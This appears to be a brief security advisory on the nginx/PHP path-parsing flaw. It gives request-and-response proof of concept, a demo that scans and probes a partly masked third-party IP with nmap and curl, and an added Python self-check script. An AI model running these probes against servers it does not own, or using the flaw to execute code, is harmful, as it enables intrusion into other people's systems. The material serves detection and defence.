Please check your server.
http://www.80sec.com/nginx-securit.html
http://www.80sec.com/iis-cgifastcgi-security-hol.html
PoC:
Request http://testsite/robots.txt
HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:05:30 GMT
Content-Type: text/plain
Content-Length: 18
Last-Modified: Thu, 20 May 2010 06:26:34 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes
Request http://testsite/robots.txt/80sec.php
HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:06:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.6
The change in Content-Type shows that a different backend is now responsible for parsing the request, so this site may be vulnerable.
Demo:
pentest@ubuntu:~$ nmap -sV -p 80 218.xx.xx.205
Interesting ports on 218.xx.xx.205:
PORT STATE SERVICE VERSION
80/tcp open http nginx web server 0.8.15
pentest@ubuntu:~$ curl --head http://218.xx.xx.205/images/intro.png -# | grep "Content-Type"
0.0%
Content-Type: image/png
pentest@ubuntu:~$ curl --head http://218.xx.xx.205/images/intro.png/test.php -# | grep "Content-Type"
Content-Type: text/html
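The same Content-Type comparison as a self-check script for your own server, in Python; this is an added example and not part of the original post. The host name, the static path and the `/check.php` suffix are assumptions, and the `fetch` argument exists so the comparison logic can be exercised offline with constructed responses. Unlike the raw PoC, it also requires a 200 status on the suffixed request, because a 404 page from nginx is itself served as text/html.

```python
import http.client
from urllib.parse import urlsplit


def head_request(url, timeout=10):
    """HEAD the URL; return (status, headers) with lower-cased header names."""
    parts = urlsplit(url)
    conn_cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(parts.hostname, parts.port, timeout=timeout)
    try:
        conn.request("HEAD", parts.path or "/")
        resp = conn.getresponse()
        return resp.status, {k.lower(): v for k, v in resp.getheaders()}
    finally:
        conn.close()


def media_type(headers):
    """Strip parameters such as '; charset=utf-8' from a Content-Type value."""
    return headers.get("content-type", "").split(";")[0].strip().lower()


def parsed_by_php(static, suffixed):
    """True when appending the bogus .php suffix moved the request to the PHP backend.

    static / suffixed are (status, headers) pairs for the plain path and the
    suffixed path. A 404 from nginx is also text/html, so a 200 on the
    suffixed path is required before the Content-Type change counts.
    """
    static_status, static_hdrs = static
    suffixed_status, suffixed_hdrs = suffixed
    if static_status != 200 or suffixed_status != 200:
        return False
    if media_type(static_hdrs) == media_type(suffixed_hdrs):
        return False
    # Same signals as the PoC above: text/html where the static file was not, or PHP naming itself.
    return media_type(suffixed_hdrs) == "text/html" or "php" in suffixed_hdrs.get("x-powered-by", "").lower()


def check_static_path(base_url, static_path, suffix="/check.php", fetch=head_request):
    """Compare the static path with the suffixed path; `fetch` is injectable for offline tests."""
    base = base_url.rstrip("/")
    return parsed_by_php(fetch(base + static_path), fetch(base + static_path + suffix))


if __name__ == "__main__":
    import sys
    # Usage: python check.py http://your-server /robots.txt   (host name is a placeholder, not from the post)
    print("parsed by PHP backend" if check_static_path(sys.argv[1], sys.argv[2]) else "served as static file")
```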